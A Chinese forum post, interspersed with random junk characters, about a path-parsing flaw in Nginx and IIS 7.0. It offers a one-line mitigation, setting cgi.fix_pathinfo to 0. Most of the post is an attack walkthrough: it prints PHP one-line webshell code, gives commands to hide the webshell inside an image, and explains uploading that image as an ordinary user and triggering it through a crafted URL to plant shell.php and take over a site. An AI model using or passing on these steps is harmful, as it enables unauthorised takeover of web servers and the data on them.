IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 ; x6 V1 Q) _4 P# l6 ]/ a8 I
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。% q' [# T _# [' o" M! O" d3 Q5 m
__________________________________ 6 c, _5 i. q/ `" _5 s$ `
5 J1 ~1 G) L6 i( r2 _& `
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
0 j F$ J7 B; T# h4 v0 g先合并一张PHP一句话图片马,合并方法:
F) R. l* F8 Q0 S①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
9 @& P3 f7 H$ h" U, m②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" ' U! B* F* Z/ ?/ s; v D5 Q* q
图片随便找一张.
6 P0 V1 a2 A$ U8 Q( Y# n. e一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?>
. m9 |/ r. M: h! l7 q) d; u然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
8 Y" a6 G6 P9 g& X4 ~. g找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 ) l/ Q: x" p) {, n( O' M( @
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
4 O* ~; o) E1 O. _" G% S2 V则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
1 W# Z- U/ J: b9 y然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
! N3 a$ q$ X4 g0 r/ _# rshell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。
# r3 F8 ~# R! u! j2 n/ C上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
% {6 }, m/ r: j' v找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
$ H( ^$ M6 m' m; ]1 V: k- N在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
$ Q' X- d) p& M9 l4 F剩下的就随便你去搞吧。4 J, ~7 V* g' U& R/ I( H
) e1 O! a' g, ^ |